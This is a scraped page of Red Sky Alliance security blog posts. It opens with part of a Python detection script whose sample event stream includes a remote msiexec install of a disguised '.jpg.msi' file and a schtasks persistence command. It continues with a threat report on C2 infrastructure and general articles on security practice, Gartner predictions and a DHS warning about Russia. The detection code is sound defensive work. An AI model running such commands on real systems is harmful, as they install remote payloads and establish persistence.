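# product does not install anything there
FAKE_DEFENDER_DROP = re.compile(r"\\AppData\\Roaming\\[^\\]*Defender[^\\]*\\.*\.exe$", re.I)
# Task registration from an XML in a Temp directory (assumption: schtasks.exe
# was used; the article only says a temporary 24rp.xml created the task)
TEMP_TASK_XML = re.compile(r'/xml\s+"?[^"\s]*\\Temp\\[^"\s]*\.xml', re.I)


def detect(events):
    """Return (rule, host, detail) for every event matching a rule, in event
    order. Rules are independent; correlating them per host is the SIEM's job."""
    findings = []
    for ev in events:
        host = ev.get("Computer", "?")
        cmd = ev.get("CommandLine", "")
        target = ev.get("TargetFilename", "")
        if ev["EventID"] == 1:
            exe = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
            if exe == "msiexec.exe" and REMOTE_MSI.search(cmd):
                findings.append(("msiexec_remote_install", host, cmd))
            if DOUBLE_EXT.search(cmd):
                findings.append(("double_extension_lure", host, cmd))
            if exe == "schtasks.exe" and TEMP_TASK_XML.search(cmd):
                findings.append(("schtasks_from_temp_xml", host, cmd))
        elif ev["EventID"] == 11:
            if FAKE_DEFENDER_DROP.search(target):
                findings.append(("fake_defender_path_drop", host, target))
            if DOUBLE_EXT.search(target):
                findings.append(("double_extension_lure", host, target))
    return findings


def _proc(image, cmd, parent):
    return {"EventID": 1, "Computer": "WS-042", "Image": image,
            "CommandLine": cmd, "ParentImage": parent}


def _file(image, target):
    return {"EventID": 11, "Computer": "WS-042", "Image": image,
            "TargetFilename": target}


# Constructed event stream: the malicious chain plus benign look-alikes.
# Host name, user, URL and task name are all made up for this example.
DROPPED_EXE = r"C:\Users\jdoe\AppData\Roaming\Windows Defender Health Check\WindowsDefenderHealthcheck.exe"
SAMPLE_EVENTS = [
    _proc(r"C:\Windows\System32\msiexec.exe",
          r'"C:\Windows\System32\msiexec.exe" /i "https://files.example.invalid/scl/fi/x1/holiday.jpg.msi?dl=0"',
          r"C:\Windows\explorer.exe"),
    _proc(r"C:\Windows\System32\msiexec.exe",      # benign local install
          r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\jdoe\Downloads\installer.msi" /qn',
          r"C:\Windows\explorer.exe"),
    _file(r"C:\Windows\System32\msiexec.exe", DROPPED_EXE),   # drop path from the article
    _file(DROPPED_EXE, r"C:\Users\jdoe\AppData\Local\Temp\24rp.xml"),  # XML alone not flagged
    _proc(r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /tn "Health Check" /xml "C:\Users\jdoe\AppData\Local\Temp\24rp.xml"',
          DROPPED_EXE),
    _file(r"C:\Windows\System32\svchost.exe",      # benign: not under the roaming profile
          r"C:\Program Files\Windows Defender\example.exe"),
]
```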
<p>Tracking a Possible Threat Actor - Our telemetry found nothing too interesting with the C2 server itself. However, digging into the server uncovered additional information. Using data from PDNS and other records, the C2 server 78[.]135.73.140 does not seem to be a shared server. This suggests the threat actor set up and fully controls the server. With this assumption, we searched for more of the threat actor’s network infrastructure. Inside the /24 subnet alone, four additional servers were revealed:<br /> <a href="{{#staticFileLink}}12239429893,RESIZE_400x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}12239429893,RESIZE_400x{{/staticFileLink}}" width="252" alt="12239429893?profile=RESIZE_400x" /></a><em>Figure 11. Partial network infrastructure</em></p>
<p>Using the August 8<sup>th</sup> date on the memo as a starting point, we searched traffic going to these servers in the month prior. While we did not find significant amounts of traffic, we identified one IP address in Colombia that connected to the server 78[.]135.73.188 in July on a port commonly used for VPN for a substantial amount of time. If the threat actor wanted to hide their activity, using a VPN server under their control would accomplish the job. The Colombia IP address belongs to a cellular company, which suggests the user may have been using a mobile hotspot. If so, this may be the location of the attacker.</p>
<p>Conclusion - The threat actor in this campaign uses a few advanced techniques, including Rust and after-hours execution, to help it stay under the radar and make analysis more difficult. The size of the network infrastructure also suggests this threat actor is not a run-of-the-mill malware developer but someone with access to resources.</p>
<p>The use of a geopolitical lure indicates that this threat actor is plugged in and knows how to target specific users.</p>
<p> </p>
<p>File <strong>IOCs</strong></p>
<p>Network <strong>IOCs</strong></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831">https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia?lctg=141970831</a></p></div>Don’t be the Loser at Cyber Securityhttps://redskyalliance.org/xindustry/don-t-be-the-loser-at-cyber-security2022-12-27T18:25:28.000Z2022-12-27T18:25:28.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10920542099,RESIZE_192X{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10920542099,RESIZE_192X{{/staticFileLink}}" alt="10920542099?profile=RESIZE_192X" width="186" /></a>I should not be writing this article in 2022, but sometimes the obvious needs to be restated. Reality has a way of asserting itself, irrespective of any personal or commercial choices we make, good or bad. For example, recently, the city services of Antwerp in Belgium were the victim of a highly disruptive cyberattack. See: <a href="https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-belgium-city-of-antwerp/">https://www.bleepingcomputer.com/news/security/play-ransomware-claims-attack-on-belgium-city-of-antwerp/</a></p>
<p>As usual, all parties cried "foul play" and suggested that proper cybersecurity measures should have been in place. As usual, it all happens a bit too late. There was nothing special or unique about the attack, and it was not the last of its kind either. Has your INFOSEC team reviewed/updated your cyber incident disaster recovery plan? Are all the documented security measures in place and tested?</p>
<p>Start with the basics: Perform proper user training that includes all the usual: password hygiene, restrictions on account sharing, and clear instructions not to open untrusted emails or access unscrupulous websites. It is inconvenient that human actions continue to be the weakest link in cyber defense, but it's a fact. Have new employees been trained?</p>
<p>Regarding the infrastructure, consider proper asset auditing because you cannot protect what you do not know exists. Next, implement network segmentation to separate traffic into the smallest practical segments. If a server does not need to see or talk to another server, then that server should not be connected to the same VLAN, with no exceptions. Remote access should move from traditional VPN access to zero-trust networking alternatives. Do all employees need access to all services and servers? Consider setting access levels for all employees.<a href="#_ftn1">[1]</a></p>
<p>Consider what needs to be encrypted for transmission and at rest, even if communication is internal only. You never know what has already been breached, so someone can eavesdrop where you least expect it.</p>
<p>Do not allow users to “randomly” plug devices into your network. Lock ports and restrict Wi-Fi access to known devices. Users will complain, but that is just part of the tradeoff. Either way, exceptions should be kept to a minimum. The IT department should be in charge of this with support from senior management.</p>
<p>Servers: Keep everything updated via patching and document it. This is true for exposed, public-facing servers, such as web servers, but it is equally essential for all servers and devices on the network. Another step is removing older/unused/forgotten equipment from networks. If a server has no reason to exist, decommission it or destroy the instance. Act ASAP, whether it is a container, VM, instance, or node. And properly erase, clear, disable or destroy old equipment before disposal.</p>
<p>An unpatched server is a vulnerable server; it only takes one vulnerable server to bring down the best cyber security program. If patching is too disruptive to do daily, look to alternative methods such as live patching and use it everywhere you can.</p>
<p>Hackers are experienced criminals, and you do not need your team to make it easier for them, so identify and close any/all vulnerabilities as quickly as possible. Due to the features of live patching, your team does not have to worry about prioritizing vulnerabilities to patch because they can patch them all.</p>
<p>Your cyber threat team should maintain a proactive approach. Keep up with the latest threats and security news. While some vulnerabilities have a disproportionate share of attention due to being "named" vulnerabilities, sometimes it is one of the countless "regular" vulnerabilities that hits the hardest. You can use a vulnerability management tool to help with this.</p>
<p>Remember your disaster recovery plan? Start from the simple premise of "what if we woke up tomorrow and none of our IT worked?" Answer these questions: How quickly can I get bare-bone services up and running? How long does it take to restore the entire data backup? Are we testing the backups regularly? Is the service deployment process adequately documented, even if it is a hard copy of scripts? What are the legal implications of losing your systems, data, or infrastructure for several weeks?</p>
<p>As an organization, you want to avoid getting into a position where your systems are down, your customers are going to your competitor's website, and your senior management is demanding answers and results. All the questions that have been posed above can be answered. Plenty of resources on the web are available to help you and your team members from suffering a breach.</p>
<p>It is up to all organizations to take steps and adopt procedures to protect themselves from cyber-attacks. </p>
<p>The following is what Red Sky Alliance recommends:</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data backup and off-site storage policies should be adopted and followed.</li>
<li>Implement two-factor authentication company-wide.</li>
<li>For USA readers, join and become active in your local Infragard chapter; there is no charge for membership. infragard.org</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures. And test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services, and devices to be used by all at-home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. RedXray service is $500 a month and provides threat intelligence on ten (10) cyber threat categories, including Keyloggers, without having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2022/12/cyber-security-is-not-losing-game-if.html">https://thehackernews.com/2022/12/cyber-security-is-not-losing-game-if.html</a></p></div>Gartner’s Top Cyber Security Predictionshttps://redskyalliance.org/xindustry/gartner-s-top-cyber-security-predictions2022-07-11T15:31:37.000Z2022-07-11T15:31:37.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}10638461098,RESIZE_180x180{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10638461098,RESIZE_180x180{{/staticFileLink}}" width="118" alt="10638461098?profile=RESIZE_180x180" /></a>Gartner’s top eight cybersecurity predictions warn organizations that they need to employ greater resilience to reduce the impact of more severe cyberattacks. Reducing the blast radius of larger, more potentially devastating attacks is key. Implied in the predictions is advice to focus not just on ransomware or any other currently trending type of cyberattack, but to prioritize cybersecurity investments as core to managing risks and see them as investments in the business. By 2025, 60% of organizations will use cybersecurity risk as a primary determinant in conducting third-party transactions and business engagements, according to Gartner‘s predictions.</p>
<p>Doubling down with greater resilience across every threat surface is key. For example, while Gartner mentions zero-trust network access (ZTNA) in just one of the eight predictions, the core concepts of ZTNA and its benefits are reflected in most of the predictions. The predictions also note that investing in preventative controls is not enough and that there needs to be a much higher priority placed on resilience. This is because threat surfaces grow faster than many organizations can gain visibility to and protect.<a href="#_ftn1">[1]</a></p>
<p>By 2025, it is expected that 80% of enterprises will adopt a strategy to unify web, cloud services, and private application access from a single vendor’s secured service edge (SSE) platform. ZTNA is one of the core technologies enabling SSE platforms.</p>
<p>The following are Gartner’s top eight cybersecurity predictions for 2022-2023:</p>
<ol>
<li>Through 2023, government regulations requiring organizations to provide consumer privacy rights will cover 5 billion citizens and more than 70% of global GDP. As of last year, nearly 3 billion individuals were covered under consumer privacy rights across 50 countries, and there’s progress on expanding privacy regulations globally. Gartner suggests organizations track subject rights request metrics, including cost per request and time to fulfill, to identify inefficiencies and justify accelerated automation.</li>
<li>By 2025, 80% of enterprises will adopt a strategy to unify web, cloud services and private application access from a single vendor’s SSE platform. There’s a groundswell of activity happening already around the unification of web, cloud services, private applications and more. Stand-alone ZTNA providers are looking to integrate into SSE and SASE platforms, with merger and acquisition activity continuing to increase. Palo Alto Networks acquiring CloudGenix, Fortinet acquiring OPAQ, Ivanti acquiring MobileIron and PulseSecure, Check Point Software Technologies acquiring Odo Security, ZScaler acquiring Edgewise Networks, Cisco acquiring Portshift and Absolute Software acquiring NetMotion are examples of this trend. “One of the key trends emerging from the pandemic has been the broad rethinking of how to provide network and security services to distributed workforces,” said Garrett Bekker, senior research analyst, security, at 451 Research, in his research report.</li>
<li>60% of organizations will embrace zero trust as a starting point for security by 2025. More than half will fail to realize the benefits. Gartner’s pessimism reflects how challenging it is becoming for organizations to secure the exponentially growing number of machine identities they’re generating, combined with identity access management (IAM) and privileged access management (PAM) failures in organizations today. Attempting to protect hybrid cloud configurations with ZTNA while adhering to the shared responsibility models of public cloud providers, including Amazon, has also proven difficult for many organizations. Getting hybrid cloud security right is hard, making any organization’s attempts to pursue a ZTNA framework challenges.</li>
<li>By 2025, 60% of organizations will use cybersecurity risk as a primary determinant in conducting third-party transactions and business engagements. This prediction implies that cybersecurity must be prioritized as a business investment, focusing on reducing operating risk. However, Gartner observes that cyberattacks aimed at third parties are increasing while only 23% of security and risk leaders monitor the third-party threat, which shows how broad an attack surface this leaves open. A sure sign that cybersecurity will be integral to business operations is when risk assessments must be completed before contracts are signed with third-party companies, a change Gartner predicts will happen within three years.</li>
<li>Through 2025, 30% of nation-states will pass legislation that regulates ransomware payments, fines, and negotiations, up from less than 1% in 2021. Today, French cybersecurity insurance firms refuse to pay a ransom if one of their clients is hit with a ransomware attack. Gartner predicts nation-states will follow the French cyber insurer’s lead and regulate ransomware payments. This prediction also shows how much of a business decision risk management, deterrence, and resilience is becoming.</li>
<li>By 2025, threat actors will have weaponized operational technology environments successfully to cause human casualties. Unfortunately, air gaps aren’t enough to protect energy, oil, gas, and processing refineries and manufacturing centers that run on industrial control systems (ICS) not designed to protect against cyberattacks. So, it’s not surprising that 46% of known operational technology (OT) cyber threats are poorly detected or not detected. In addition, Honeywell finds that 11% are never detected and most detection engines and techniques catch just 35% of all attempted breaches.</li>
<li>By 2025, 70% of CEOs will mandate a culture of organizational resilience to survive coinciding threats from cybercrime, severe weather events, civil unrest, and political instabilities. Another prediction shows how CEOs are looking more at cybersecurity as a risk management issue, not purely an IT one. Gartner’s inquiry calls must be heavily slanted to fighting the most popular cyberattack strategies for a given month or period when what’s needed is a rethinking of the cybersecurity tech stack for more severe threats and risk. Gartner’s prioritizing of resilience shows that their clients want stop-gap help with current cybersecurity weaknesses when a more complete cybersecurity tech stack overhaul is needed.</li>
<li>By 2026, 50% of C-level executives will have performance requirements related to risk built into their employment contracts. Forward-thinking boards of directors started holding CEOs accountable for their environmental, social, and governance (ESG) initiatives more than three years ago. CIOs have had their pay indexed to how much their departments help reduce roadblocks to more revenue and, most importantly, how well they serve sales to help them drive more revenue. Risk management is a core skill a CIO and CISO need for excelling in their work, much the same way a CEO needs to know how to excel at ESG initiatives. The background support for this prediction has been steadily growing for years.</li>
</ol>
<p>The eight cybersecurity predictions are useful for CIOs, CISOs and their teams to start thinking about what they’re doing to become more resilient and how to redefine their tech stacks to handle entirely new types of attacks. Cybersecurity becomes a business decision when CISOs have their pay indexed to risk management. That is a step in the right direction of seeing resilience as a core business strength to be improved.</p>
<p>It is up to all organizations to take steps and adopt procedures to protect themselves from cyberattacks. Predictions are informative, but all managers need to take steps to protect their organizations from cyberattacks and ransomware demands today.</p>
<p>The following is what Red Sky Alliance recommends:</p>
<ul>
<li>All data in transmission and at rest should be encrypted.</li>
<li>Proper data backup and off-site storage policies should be adopted and followed.</li>
<li>Implement 2-factor authentication company-wide.</li>
<li>For USA readers, join and become active in your local InfraGard chapter; there is no charge for membership (infragard.org).</li>
<li>Update disaster recovery plans and emergency procedures with cyber threat recovery procedures, and test them.</li>
<li>Institute cyber threat and phishing training for all employees, with testing and updating.</li>
<li>Recommend/require cyber security software, services, and devices to be used by all at-home working employees and consultants.</li>
<li>Review and update your cyber threat and information security policies and procedures. Make them a part of all emergency planning and training.</li>
<li>Ensure that all software updates and patches are installed immediately.</li>
<li>Enroll your company/organization in RedXray for daily cyber threat notifications directed at your domains. RedXray service is $500 a month and provides threat intelligence on ten (10) cyber threat categories including Keyloggers, without having to connect to your network.</li>
<li>Purchase annual cyber insurance coverage from Red Sky Alliance provided by Cysurance.</li>
</ul>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://venturebeat.com/2022/06/22/what-gartners-top-cybersecurity-predictions-for-2022-23-reveal/">https://venturebeat.com/2022/06/22/what-gartners-top-cybersecurity-predictions-for-2022-23-reveal/</a></p></div>DHS Warns of Russian Cyber Attackhttps://redskyalliance.org/xindustry/dhs-warns-of-russian-cyber-attack2022-01-27T17:08:46.000Z2022-01-27T17:08:46.000ZMac McKeehttps://redskyalliance.org/members/MacMcKee<div><p>The U.S. Department of Homeland Security is reportedly warning that the U.S. could witness a retaliatory cyberattack at the hands of Russia if it decides to respond to the latter's potential invasion of Ukraine, where 100,000 or more troops have been amassed for weeks. According to a DHS Intelligence and Analysis bulletin dated 23 January 2022 and sent to law enforcement agencies around the country, officials believe that if the U.S. responds to rising tensions at Ukraine's eastern border, the Russian government or its state-sponsored actors could initiate a cyberattack.</p>
<p>The document reportedly reads: "We assess that Russia would consider initiating a cyberattack against the Homeland if it perceived a U.S. or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security." DHS warns that Russia can employ a "range of offensive cyber tools" against U.S. networks, including "a low-level denial of service attack" or a "destructive" attack on critical infrastructure.</p>
<p>DHS officials maintain that Russia's "threshold for conducting disruptive or destructive cyberattacks … remains very high." These are attacks, the agency says, that Moscow has not directly employed against U.S. infrastructure in the past, although it has engaged in cyberespionage campaigns such as <a href="https://www.bankinfosecurity.com/7-takeaways-supply-chain-attack-hits-solarwinds-customers-a-15585">SolarWinds</a>. The latter, distributed via a corrupt update to SolarWinds' software, later affected 100 organizations globally, with follow-on attacks at nine U.S. federal agencies, including DHS and the Department of Commerce. Experts have attributed the campaign to <a href="https://attack.mitre.org/groups/G0016/">APT29</a>, aka Nobelium, which is linked to Russia's Foreign Intelligence Service, or SVR.</p>
<p>The 23 January 2022 bulletin also highlights Russia-linked attacks targeting Ukraine's electric grid, which struck in 2015 and 2016. "This is not at all unanticipated and is right in line with the joint alert from the FBI and CISA about 10 days ago," says Mike Hamilton, former vice chair for the DHS State, Local, Tribal, and Territorial Government Coordinating Council. "Geopolitical tensions are at a high … [and] the U.S. should not feel as though this activity is confined to NATO-curious countries. It's been well-reported … that Russian fingerprints have been found inside our own critical infrastructure networks. It is unlikely that all the access gained has been taken back."</p>
<p>Hamilton, former CISO for the city of Seattle and currently the CISO for the firm Critical Insight, adds, "Given all this information and these trends, it is likely that any military action taken by the U.S. in Ukraine will be met by actions designed to give the U.S. other things to worry about."</p>
<p>The latest warning follows a rapid surge in crypto-locking attacks eyeing U.S. targets in 2021. These include Russia-backed ransomware hits on <a href="https://www.govinfosecurity.com/fbi-darkside-ransomware-used-in-colonial-pipeline-attack-a-16555">Colonial Pipeline</a>, which caused fuel shortages along the U.S. East Coast; also, the world's largest meat supplier, <a href="https://www.govinfosecurity.com/blogs/ransomware-to-riches-story-jbs-pays-criminals-11-million-p-3055">JBS</a>, went dark after Russian hackers crypto-locked its systems.</p>
<p>Earlier this month, multiple Ukrainian websites were defaced with warnings to "be afraid and expect the worst," which came as troops continued to amass at the country's eastern border. Several government websites affected by the breach were taken offline to be restored. Defaced websites included messages written in Ukrainian, Russian and Polish. The incident occurred after a week of diplomatic discussions between NATO and Russia.</p>
<p>Ukraine-Russia relations have continued to sour in recent months, after Russian President Vladimir Putin criticized Ukraine's plans to join NATO. The White House subsequently warned that Moscow was running disinformation campaigns targeting Ukraine President Volodymyr Zelensky's administration. Putin threatened to further invade Ukraine if the country is allowed to join NATO. But the U.S. and its NATO allies said Ukraine's decision is not open to negotiation and have called on Moscow to de-escalate and pursue diplomacy, threatening that there will be reprisals for any further military activity.</p>
<p>Despite warnings from U.S. President Joe Biden to the Kremlin, Putin has remained steadfast on preventing Ukraine's NATO entry, and he has sought a NATO troop withdrawal from Eastern Europe. Foreign policy experts contend that Russia views Ukraine, a former Soviet state, as part of its sphere of influence. Russia annexed the Crimean Peninsula in southern Ukraine in 2014.</p>
<p>While other security experts say the alert is not terribly surprising, it is certainly worth closely monitoring. "DHS often releases alerts around potential upticks in activity," says Ross Rustici, a former technical lead for the U.S. Department of Defense and currently the managing director of the advisory firm StoneTurn. "Ultimately, these pronouncements do little to shift the needle on public opinion or corporate behavior. There is a significant record of Russian intrusions into CI/KR [critical infrastructure and key resources] that is sustained and ongoing. We would be best served by concentrating our efforts on continued security around those systems."</p>
<p>"We've yet to see cyberattacks used in concert with a full-fledged military campaign. DHS' warning sets that expectation that something has changed in the threat profile," says Tim Erlin, vice president of the firm Tripwire. "Organizations should be prepared for a change in the types of attacks they see."</p>
<p>"To see this warning coming out of the DHS at a point when tensions are so high is not necessarily surprising," says Lisa Plaggemier, interim executive director of the National Cybersecurity Alliance. "Nonetheless, [it] once again serves to underline how important it is that individuals and businesses prioritize cybersecurity. Fortunately, there has been a dedicated effort within the government to bolster its own cybersecurity capabilities and to promote cybersecurity awareness among the private sector and general public."</p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at <a>1-844-492-7225</a>, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p><strong>Weekly Cyber Intelligence Briefings</strong>:</p>
<p><br /> Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a><br />Website: <a href="https://www.wapacklabs.com/">https://www.wapacklabs.com/</a><br />LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><br /> REDSHORTS - Weekly Cyber Intelligence Briefings<br /> <a href="https://attendee.gotowebinar.com/register/3702558539639477516">https://attendee.gotowebinar.com/register/3702558539639477516</a></p>
<p>Article <a href="{{#staticFileLink}}10051028892,original{{/staticFileLink}}">TR-22-027-001.pdf</a></p></div>